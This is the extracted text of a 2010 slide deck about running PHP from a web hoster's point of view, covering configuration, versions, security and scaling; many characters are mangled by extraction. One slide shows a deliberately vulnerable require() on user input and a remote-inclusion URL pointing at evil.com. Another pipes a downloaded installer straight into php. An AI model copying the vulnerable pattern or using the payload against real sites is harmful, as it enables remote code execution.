Php through the eyes of a hoster

PHP through the eyes of a hoster Thijs Feryn Support manager +32 (0)9 218 79 06 thijs@combellgroup.com

About me I’m the support manager at Combell

About me I’m a board member at PHPBenelux

About me Modest contribu=ons to:

I live in the wonderful city of Bruges MPBecker -‐ Bruges by Night hKp://www.ﬂickr.com/photos/galverson2/3715965933

Follow me on TwiKer: @ThijsFeryn Rate my talk: hKp://joind.in/1541 Read my blog: hKp://blog.feryn.eu

Chapter I : The hoster, a genuine stakeholder in the PHP universe

Stakeholders Customer Development company Endusers MGMT Devs MGMT Design PM Internal Internal IT PM Sales QA Systeam Consultants Hoster PHP community

Stakeholders Somewhere along the road ... Your app needs to be hosted

Goals & mo]ves Our goals & mo=ves are the same as yours: • It has to work • It has to perform • It has to scale • It has to be secure • It has to be available

Chapter II: Installa]on & conﬁgura]on

Installing from source server$ ./configure -‐-‐prefix=/usr/local/php-‐5.2.10 -‐-‐with-‐apxs2=/usr/local/httpd-‐2.2.12/bin/apxs -‐-‐ with-‐zlib -‐-‐with-‐curl -‐-‐with-‐gd -‐-‐enable-‐mbstring -‐-‐with-‐mysql -‐-‐with-‐mysqli -‐-‐enable-‐pcntl -‐-‐with-‐ pdo-‐mysql -‐-‐with-‐readline -‐-‐enable-‐soap -‐-‐with-‐xsl -‐-‐with-‐mcrypt -‐-‐with-‐mssql -‐-‐with-‐snmp -‐-‐with-‐imap -‐-‐with-‐kerberos -‐-‐with-‐imap-‐ssl -‐-‐with-‐config-‐ file-‐path=/etc/php5/ -‐-‐enable-‐sockets -‐-‐with-‐ freetype-‐dir -‐-‐with-‐openssl server$ make server$ make install

Installing using a package manager (APT/Ap]tude) Install PHP: server$ apt-‐get install php5 Install MySQL library for PHP: server$ apt-‐get install php5-‐mysql

SAPI ... schmapi Mod_php FastCGI CLI Web Apache module gateway -‐ Process Apache process php-‐cgi php Configura=on Apache conf files wrapper on the fly shell user or User Apache user shell user suexec user

FastCGI Example conﬁg: • Apache handler <IfModule mod_fcgid.c> SuexecUserGroup dev dev PHP_Fix_Pathinfo_Enable 1 <Directory /var/www/dev/www/> Options +ExecCGI AllowOverride All AddHandler fcgid-‐script .php FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php Order allow,deny Allow from all </Directory> </IfModule>

FastCGI Example conﬁg: • Wrapper script #!/bin/sh PHPRC=/usr/local/php-‐5.3.1/etc export PHPRC export PHP_FCGI_MAX_REQUESTS=5000 export PHP_FCGI_CHILDREN=8 exec /usr/local/php-‐5.3.1/bin/php-‐cgi

INI se`ngs: tales of good & evil

INI se`ngs: tales of good & evil Defining INI seRngs: • Php.ini • Ini_set() • “-‐d” • php_value • php_flag • php_admin_value • php_admin_flag

INI se`ngs: tales of good & evil Memory_limit: Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)

INI se`ngs: tales of good & evil Safe_mode & Open_basedir: <IfModule mod_php5.c> php_admin_flag engine on php_admin_flag safe_mode off php_admin_value open_basedir "/var/www/vhosts/ website.com/httpdocs:/tmp" </IfModule>

INI se`ngs: tales of good & evil Allow_url_fopen: <?php $lang= $_GET['lang']; require("$lang.php"); http://domain.ext/index.php?lang=http://evil.com/hack.txt?

Chapter III: Versions & features

PHP 4: End of life, but far from dead

PHP 4: End of life, but far from dead Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4

Developers love bling bling

It HAS to be PHP 5.3.2 !!!

I need ALL PHP extension !!!

I use ALL PHP features !!!

Fruit & vegetables: PEAR & PECL

Fruit & vegetables: PEAR & PECL PEAR PHP Extension and Applica=on Repository (h#p//pear.php.net) server$ lynx -‐source http://pear.php.net/go-‐pear | php server$ pear install date

Fruit & vegetables: PEAR & PECL PECL (pickle) PHP Extension Community Library (h#p//pecl.php.net) server$ pecl install pecl_http

External frameworks Popular frameworks outside the PHP project

Chapter IV: PHP aKracts a crowd

It’s easy !

That easy ! <?php echo "Hello world!";

It’s cheap !

It’s stable !

Everyone can be a PHP developer

But not everyone has what it takes

Luckily there’s a lot ready-‐to-‐use PHP so_ware out there

Who you gonna call ?

But when helpers need help ...

They reach out to the PHP community User Group mee=ngs Twiaer Blogs Forums PHP.net IRC Conferences

Chapter V: Here be phpirates

Here be phpirates

Fact “The majority of hacking/absue cases are PHP related”

False assump]ons “Open source is evil” “PHP has lots of security vulnerabili=es and is not mature”

Here be phpirates The real issues • Quality of the code • Network & server security • PHP version & conﬁgura=on

Responsibili]es

Chapter VI: Scalability

Performance == speed

Scalability == constant speed under increasing load

Scaling up

Scaling out

Developers (some2mes) forget ...

Scaling MySQL

mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12; *************************** 1. row *************************** id: 1 select_type: PRIMARY table: table1 type: ALL possible_keys: approved key: approved key_len: NULL ref: NULL rows: 3143 Extra: Using where; Using filesort *************************** 2. row *************************** id: 2 select_type: DEPENDENT SUBQUERY table: table2 type: ALL possible_keys: NULL key: NULL key_len: NULL ref: NULL rows: 1005 Extra: Using where

Scaling MySQL with replica]on

PHP scalability toolbox

Memcached

Gearman

Varnish

Summary

Summary 1.Hosters are a genuine stakeholder in the PHP universe 2.PHP is highly flexible & configurable. Hosters have to ensure a decent setup 3.PHP has a lot to offer feature-‐wise 4.PHP aDracts a crowd and brings a lot of people together from different industries (e.g. hosters) 5.Lots of abuse cases are PHP related, but that’s not the fault of PHP itself 6.PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools

Php through the eyes of a hoster

by Combell Group on Oct 06, 2010

Accessibility

Categories

Tags

Upload Details

Usage Rights

Statistics

Php through the eyes of a hoster — Presentation Transcript